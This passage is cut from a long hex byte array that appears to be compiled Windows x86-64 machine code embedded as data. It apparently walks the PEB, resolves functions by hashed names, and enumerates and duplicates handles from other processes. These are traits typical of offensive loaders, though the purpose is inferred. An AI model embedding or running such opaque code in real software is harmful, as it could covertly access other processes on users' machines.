65,0x48,0x8B,0x00,0x48,0x89,0x45,0xC0,0x48,0x8B,0x45,0xC0,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x48,0x8B,0x40,0x18,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x48,0x83,0xC0,0x10,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x40,0x10,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0x10,0xBA,0x5C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x9D,0x86,0x00,0x00,0x48,0x85,0xC0,0x0F,0x95,0xC0,0x0F,0xB6,0xC0,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x74,0x29,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x50,0x50,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0x48,0x8B,0x05,0xB5,0x28,0x01,0x00,0xFF,0xD0,0x85,0xC0,0x75,0x36,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0xE9,0x03,0x01,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x50,0x60,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0x48,0x8B,0x05,0x8C,0x28,0x01,0x00,0xFF,0xD0,0x85,0xC0,0x75,0x0D,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0xE9,0xDA,0x00,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x3B,0x45,0xE0,0x75,0x93,0x83,0x7D,0x18,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xB5,0x00,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x8D,0x05,0x98,0xAA,0x00,0x00,0x48,0x89,0xC1,0xE8,0x05,0xFF,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0xDA,0xEC,0x01,0xA3,0x48,0x89,0xC1,0xE8,0x13,0xFD,0xFF,0xFF,0x48,0x89,0x45,0xD0,0x48,0x83,0x7D,0xD0,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x7C,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0x45,0xB8,0x48,0x8B,0x45,0xB8,0xBA,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0xD2,0x81,0x00,0x00,0x66,0x89,0x45,0xB0,0x0F,0xB7,0x45,0xB0,0x01,0xC0,0x66,0x89,0x45,0xB0,0x0F,0xB7,0x45,0xB0,0x83,0xC0,0x02,0x66,0x89,0x45,0xB2,0x48,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0x48,0x8D,0x4D,0xA8,0x48,0x8D,0x55,0xB0,0x48,0x8B,0x45,0xD0,0x49,0x89,0xC9,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xFF,0xD0,0x89,0x45,0xCC,0x83,0x7D,0xCC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xA8,0x48,0x83,0xEC,0x80,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x53,0x48,0x83,0xEC,0x58,0x48,0x8D,0x6C,0x24,0x50,0x89,0x4D,0x20,0x89,0x55,0x28,0x4C,0x89,0x45,0x30,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0x48,0x8B,0x05,0xA7,0x26,0x01,0x00,0xFF,0xD0,0x41,0xB8,0x88,0x38,0x01,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xA0,0x26,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xE8,0x48,0x83,0x7D,0xE8,0x00,0x0F,0x84,0x2B,0x01,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0xD0,0x48,0x89,0xC2,0x48,0x8D,0x05,0x8A,0xA9,0x00,0x00,0x48,0x89,0xC1,0xE8,0x5D,0x12,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x0F,0x84,0x04,0x01,0x00,0x00,0x48,0x8D,0x55,0xD4,0x48,0x8D,0x45,0xD8,0x48,0x89,0xC1,0xE8,0xDB,0x0D,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x0F,0x84,0xEA,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xE9,0xB5,0x00,0x00,0x00,0x48,0x8B,0x4D,0xD8,0x8B,0x55,0xF8,0x48,0x89,0xD0,0x48,0x01,0xC0,0x48,0x01,0xD0,0x48,0xC1,0xE0,0x03,0x48,0x01,0xC8,0x48,0x83,0xC0,0x08,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x39,0x45,0x20,0x75,0x7C,0x48,0x8B,0x45,0xE0,0x8B,0x40,0x10,0x23,0x45,0x28,0x39,0x45,0x28,0x75,0x70,0x48,0x8B,0x45,0xE0,0x0F,0xB6,0x40,0x04,0x0F,0xB6,0xD0,0x8B,0x45,0xD0,0x39,0xC2,0x75,0x61,0x48,0x8B,0x45,0xE8,0x8B,0x00,0x83,0xC0,0x01,0x3D,0x10,0x27,0x00,0x00,0x76,0x20,0x48,0x8D,0x05,0xF6,0xA8,0x00,0x00,0x48,0x89,0xC1,0xE8,0x5E,0xDA,0xFF,0xFF,0x48,0x8D,0x05,0x15,0xA9,0x00,0x00,0x48,0x89,0xC1,0xE8,0x4F,0xDA,0xFF,0xFF,0xEB,0x60,0x48,0x8B,0x45,0xE0,0x0F,0xB7,0x40,0x06,0x44,0x0F,0xB7,0xC0,0x48,0x8B,0x45,0xE8,0x8B,0x00,0x8D,0x48,0x01,0x48,0x8B,0x55,0xE8,0x89,0x0A,0x4C,0x89,0xC1,0x48,0x8B,0x55,0xE8,0x89,0xC0,0x48,0x89,0x4C,0xC2,0x08,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x45,0xF8,0x01,0x48,0x8B,0x45,0xD8,0x8B,0x00,0x39,0x45,0xF8,0x0F,0x82,0x3C,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x30,0x48,0x8B,0x55,0xE8,0x48,0x89,0x10,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xFC,0x00,0x75,0x4E,0x48,0x83,0x7D,0xE8,0x00,0x74,0x47,0x48,0x83,0x7D,0xE8,0x00,0x74,0x40,0x48,0x8B,0x45,0xE8,0x41,0xB8,0x88,0x38,0x01,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x2A,0x83,0x00,0x00,0x48,0x8B,0x05,0x1B,0x25,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x1B,0x25,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xD8,0x48,0x85,0xC0,0x74,0x4B,0x48,0x8B,0x45,0xD8,0x48,0x85,0xC0,0x74,0x42,0x8B,0x45,0xD4,0x89,0xC2,0x48,0x8B,0x45,0xD8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xD6,0x82,0x00,0x00,0x48,0x8B,0x5D,0xD8,0x48,0x8B,0x05,0xC3,0x24,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xC7,0x24,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x58,0x5B,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x58,0x48,0x8D,0x6C,0x24,0x50,0x89,0x4D,0x20,0x89,0x55,0x28,0x4C,0x89,0x45,0x30,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0x48,0x8B,0x05,0x62,0x24,0x01,0x00,0xFF,0xD0,0x41,0xB8,0x88,0x38,0x01,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x5B,0x24,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xE8,0x48,0x83,0x7D,0xE8,0x00,0x0F,0x84,0x2B,0x01,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0xD0,0x48,0x89,0xC2,0x48,0x8D,0x05,0x85,0xA7,0x00,0x00,0x48,0x89,0xC1,0xE8,0x18,0x10,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x0F,0x84,0x04,0x01,0x00,0x00,0x48,0x8D,0x55,0xD4,0x48,0x8D,0x45,0xD8,0x48,0x89,0xC1,0xE8,0x96,0x0B,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x0F,0x84,0xEA,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xE9,0xB5,0x00,0x00,0x00,0x48,0x8B,0x4D,0xD8,0x8B,0x55,0xF8,0x48,0x89,0xD0,0x48,0x01,0xC0,0x48,0x01,0xD0,0x48,0xC1,0xE0,0x03,0x48,0x01,0xC8,0x48,0x83,0xC0,0x08,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x39,0x45,0x20,0x75,0x7C,0x48,0x8B,0x45,0xE0,0x8B,0x40,0x10,0x23,0x45,0x28,0x39,0x45,0x28,0x75,0x70,0x48,0x8B,0x45,0xE0,0x0F,0xB6,0x40,0x04,0x0F,0xB6,0xD0,0x8B,0x45,0xD0,0x39,0xC2,0x75,0x61,0x48,0x8B,0x45,0xE8,0x8B,0x00,0x83,0xC0,0x01,0x3D,0x10,0x27,0x00,0x00,0x76,0x20,0x48,0x8D,0x05,0xB1,0xA6,0x00,0x00,0x48,0x89,0xC1,0xE8,0x19,0xD8,0xFF,0xFF,0x48,0x8D,0x05,0xD0,0xA6,0x00,0x00,0x48,0x89,0xC1,0xE8,0x0A,0xD8,0xFF,0xFF,0xEB,0x60,0x48,0x8B,0x45,0xE0,0x0F,0xB7,0x40,0x06,0x44,0x0F,0xB7,0xC0,0x48,0x8B,0x45,0xE8,0x8B,0x00,0x8D,0x48,0x01,0x48,0x8B,0x55,0xE8,0x89,0x0A,0x4C,0x89,0xC1,0x48,0x8B,0x55,0xE8,0x89,0xC0,0x48,0x89,0x4C,0xC2,0x08,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x45,0xF8,0x01,0x48,0x8B,0x45,0xD8,0x8B,0x00,0x39,0x45,0xF8,0x0F,0x82,0x3C,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x30,0x48,0x8B,0x55,0xE8,0x48,0x89,0x10,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xD8,0x48,0x85,0xC0,0x74,0x4B,0x48,0x8B,0x45,0xD8,0x48,0x85,0xC0,0x74,0x42,0x8B,0x45,0xD4,0x89,0xC2,0x48,0x8B,0x45,0xD8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE5,0x80,0x00,0x00,0x48,0x8B,0x5D,0xD8,0x48,0x8B,0x05,0xD2,0x22,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xD6,0x22,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x83,0x7D,0xFC,0x00,0x75,0x4E,0x48,0x83,0x7D,0xE8,0x00,0x74,0x47,0x48,0x83,0x7D,0xE8,0x00,0x74,0x40,0x48,0x8B,0x45,0xE8,0x41,0xB8,0x88,0x38,0x01,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x91,0x80,0x00,0x00,0x48,0x8B,0x05,0x82,0x22,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x82,0x22,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x58,0x5B,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x58,0x48,0x8D,0x6C,0x24,0x50,0x89,0x4D,0x20,0x89,0x55,0x28,0x4C,0x89,0x45,0x30,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0x8B,0x05,0x16,0x22,0x01,0x00,0xFF,0xD0,0x41,0xB8,0x88,0x38,0x01,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x0F,0x22,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xE8,0x48,0x83,0x7D,0xE8,0x00,0x0F,0x84,0x24,0x01,0x00,0x00,0x48,0x8D,0x45,0xD0,0x48,0x89,0xC2,0x48,0x8D,0x05,0x50,0xA5,0x00,0x00,0x48,0x89,0xC1,0xE8,0xD3,0x0D,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x0F,0x84,0x04,0x01,0x00,0x00,0x48,0x8D,0x55,0xD4,0x48,0x8D,0x45,0xD8,0x48,0x89,0xC1,0xE8,0x51,0x09,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x0F,0x84,0xEA,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xE9,0xB5,0x00,0x00,0x00,0x48,0x8B,0x4D,0xD8,0x8B,0x55,0xF8,0x48,0x89,0xD0,0x48,0x01,0xC0,0x48,0x01,0xD0,0x48,0xC1,0xE0,0x03,0x48,0x01,0xC8,0x48,0x83,0xC0,0x08,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x39,0x45,0x20,0x75,0x7C,0x48,0x8B,0x45,0xE0,0x8B,0x40,0x10,0x23,0x45,0x28,0x39,0x45,0x28,0x75,0x70,0x48,0x8B,0x45,0xE0,0x0F,0xB6,0x40,0x04,0x0F,0xB6,0xD0,0x8B,0x45,0xD0,0x39,0xC2,0x75,0x61,0x48,0x8B,0x45,0xE8,0x8B,0x00,0x83,0xC0,0x01,0x3D,0x10,0x27,0x00,0x00,0x76,0x20,0x48,0x8D,0x05,0x6C,0xA4,0x00,0x00,0x48,0x89,0xC1,0xE8,0xD4,0xD5,0xFF,0xFF,0x48,0x8D,0x05,0x8B,0xA4,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC5,0xD5,0xFF,0xFF,0xEB,0x60,0x48,0x8B,0x45,0xE0,0x0F,0xB7,0x40,0x06,0x44,0x0F,0xB7,0xC0,0x48,0x8B,0x45,0xE8,0x8B,0x00,0x8D,0x48,0x01,0x48,0x8B,0x55,0xE8,0x89,0x0A,0x4C,0x89,0xC1,0x48,0x8B,0x55,0xE8,0x89,0xC0,0x48,0x89,0x4C,0xC2,0x08,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x45,0xF8,0x01,0x48,0x8B,0x45,0xD8,0x8B,0x00,0x39,0x45,0xF8,0x0F,0x82,0x3C,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x30,0x48,0x8B,0x55,0xE8,0x48,0x89,0x10,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xD8,0x48,0x85,0xC0,0x74,0x4B,0x48,0x8B,0x45,0xD8,0x48,0x85,0xC0,0x74,0x42,0x8B,0x45,0xD4,0x89,0xC2,0x48,0x8B,0x45,0xD8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xA0,0x7E,0x00,0x00,0x48,0x8B,0x5D,0xD8,0x48,0x8B,0x05,0x8D,0x20,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x91,0x20,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x83,0x7D,0xFC,0x00,0x75,0x4E,0x48,0x83,0x7D,0xE8,0x00,0x74,0x47,0x48,0x83,0x7D,0xE8,0x00,0x74,0x40,0x48,0x8B,0x45,0xE8,0x41,0xB8,0x88,0x38,0x01,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x4C,0x7E,0x00,0x00,0x48,0x8B,0x05,0x3D,0x20,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x3D,0x20,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x58,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x70,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x01,0x00,0x00,0xC0,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xC0,0x0F,0x11,0x45,0xD0,0x0F,0x11,0x45,0xE0,0x66,0x0F,0xD6,0x45,0xF0,0x48,0x8D,0x55,0xC0,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x38,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x8E,0x38,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x78,0x3B,0x8B,0x45,0xC4,0x23,0x45,0x18,0x39,0x45,0x18,0x75,0x09,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x28,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0x8D,0x05,0x15,0xA3,0x00,0x00,0x48,0x89,0xC1,0xE8,0x25,0xD4,0xFF,0xFF,0x48,0x8D,0x05,0xDC,0xA2,0x00,0x00,0x48,0x89,0xC1,0xE8,0x16,0xD4,0xFF,0xFF,0xEB,0x01,0x90,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x70,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x50,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x48,0x83,0x7D,0x10,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x68,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8D,0x4D,0xF0,0x48,0x8B,0x45,0x10,0xC7,0x44,0x24,0x30,0x02,0x00,0x00,0x00,0x8B,0x55,0x18,0x89,0x54,0x24,0x28,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x49,0x89,0xC9,0x49,0xC7,0xC0,0xFF,0xFF,0xFF,0xFF,0x48,0xC7,0xC2,0xFF,0xFF,0xFF,0xFF,0x48,0x89,0xC1,0xE8,0x89,0x37,0x00,0x00,0x89,0x45,0xFC,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0xB4,0x33,0x00,0x00,0x48,0xC7,0x45,0x10,0x00,0x00,0x00,0x00,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xF0,0x48,0x83,0xC4,0x50,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x60,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x01,0x00,0x00,0xC0,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0x10,0x00,0x0F,0x84,0x8E,0x00,0x00,0x00,0x83,0x7D,0x18,0x00,0x75,0x07,0xC7,0x45,0xFC,0x02,0x00,0x00,0x00,0x48,0x8D,0x55,0xF0,0x48,0x8B,0x45,0x10,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x40,0x00,0x00,0x00,0x49,0x89,0xD1,0x49,0xC7,0xC0,0xFF,0xFF,0xFF,0xFF,0x48,0x89,0xC2,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xE8,0xD9,0x36,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x78,0x42,0x48,0x8B,0x45,0xF0,0x48,0x8D,0x4D,0xE8,0x8B,0x55,0xFC,0x89,0x54,0x24,0x30,0x8B,0x55,0x20,0x89,0x54,0x24,0x28,0x8B,0x55,0x18,0x89,0x54,0x24,0x20,0x49,0x89,0xC9,0x49,0xC7,0xC0,0xFF,0xFF,0xFF,0xFF,0x48,0xC7,0xC2,0xFF,0xFF,0xFF,0xFF,0x48,0x89,0xC1,0xE8,0x9A,0x36,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0x10,0x00,0x74,0x0C,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0xB4,0x32,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0x85,0xC0,0x74,0x0C,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x9F,0x32,0x00,0x00,0x48,0x8B,0x45,0xE8,0x48,0x83,0xC4,0x60,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0xC7,0x45,0xEC,0x60,0x00,0x00,0x00,0x8B,0x45,0xEC,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE0,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x05,0x18,0x01,0x00,0x00,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x8B,0x00,0x83,0xF8,0x06,0x77,0x07,0xB8,0x10,0x04,0x00,0x00,0xEB,0x05,0xB8,0x10,0x10,0x00,0x00,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0xC7,0x45,0xEC,0x60,0x00,0x00,0x00,0x8B,0x45,0xEC,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE0,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x05,0x18,0x01,0x00,0x00,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x8B,0x00,0x83,0xF8,0x06,0x77,0x07,0xB8,0x80,0x04,0x00,0x00,0xEB,0x05,0xB8,0x80,0x10,0x00,0x00,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0xC7,0x45,0xEC,0x60,0x00,0x00,0x00,0x8B,0x45,0xEC,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE0,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x05,0x18,0x01,0x00,0x00,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x8B,0x00,0x83,0xF8,0x06,0x77,0x07,0xB8,0x10,0x04,0x00,0x00,0xEB,0x05,0xB8,0x10,0x10,0x00,0x00,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x70,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x44,0x89,0x4D,0x28,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xE8,0xE7,0xFE,0xFF,0xFF,0x89,0x45,0xEC,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x83,0xBD,0x88,0x00,0x00,0x00,0x00,0x75,0x09,0x83,0xBD,0x90,0x00,0x00,0x00,0x00,0x74,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x05,0xB8,0x00,0x00,0x00,0x00,0x89,0x45,0xDC,0x48,0x83,0x7D,0x10,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xE1,0x01,0x00,0x00,0x83,0x7D,0x30,0x00,0x74,0x0E,0xC7,0x45,0x28,0x01,0x00,0x00,0x00,0xC7,0x45,0x20,0x01,0x00,0x00,0x00,0x83,0xBD,0x90,0x00,0x00,0x00,0x00,0x74,0x07,0xC7,0x45,0x20,0x01,0x00,0x00,0x00,0x83,0xBD,0x98,0x00,0x00,0x00,0x00,0x74,0x04,0x83,0x4D,0xE8,0x02,0x83,0x7D,0x70,0x00,0x75,0x06,0x83,0x7D,0x78,0x00,0x74,0x10,0x83,0x7D,0xDC,0x00,0x75,0x0A,0xE8,0xA9,0xFE,0xFF,0xFF,0x89,0x45,0xEC,0xEB,0x11,0x83,0xBD,0x98,0x00,0x00,0x00,0x00,0x74,0x08,0xE8,0xE3,0xFE,0xFF,0xFF,0x89,0x45,0xEC,0x8B,0x45,0xEC,0x89,0x45,0xE0,0x83,0x7D,0x28,0x00,0x74,0x07,0xC7,0x45,0xEC,0x00,0x10,0x00,0x00,0x44,0x8B,0x4D,0x38,0x44,0x8B,0x45,0x20,0x8B,0x55,0xEC,0x8B,0x45,0x18,0x8B,0x4D,0xE8,0x89,0x4C,0x24,0x30,0x8B,0x4D,0x48,0x89,0x4C,0x24,0x28,0x8B,0x4D,0x40,0x89,0x4C,0x24,0x20,0x89,0xC1,0xE8,0x4C,0x01,0x00,0x00,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x0F,0x84,0x08,0x01,0x00,0x00,0x8B,0x55,0xEC,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0xB9,0xFB,0xFF,0xFF,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x0F,0x84,0xEF,0x00,0x00,0x00,0x83,0x7D,0x28,0x00,0x74,0x41,0x8B,0x4D,0xE8,0x8B,0x55,0xE0,0x48,0x8B,0x45,0xF0,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xC3,0xFC,0xFF,0xFF,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x0F,0x84,0xC8,0x00,0x00,0x00,0x8B,0x55,0xE0,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x73,0xFB,0xFF,0xFF,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x75,0x52,0xE9,0xB8,0x00,0x00,0x00,0x83,0x7D,0x70,0x00,0x75,0x0F,0x83,0x7D,0x78,0x00,0x75,0x09,0x83,0xBD,0x98,0x00,0x00,0x00,0x00,0x74,0x38,0x83,0x7D,0xDC,0x00,0x74,0x32,0x8B,0x55,0xE8,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0xE2,0xFB,0xFF,0xFF,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x79,0x8B,0x55,0xE0,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x21,0xFB,0xFF,0xFF,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x74,0x64,0x83,0x7D,0x70,0x00,0x74,0x1A,0x8B,0x55,0xE8,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0xEF,0x0B,0x00,0x00,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74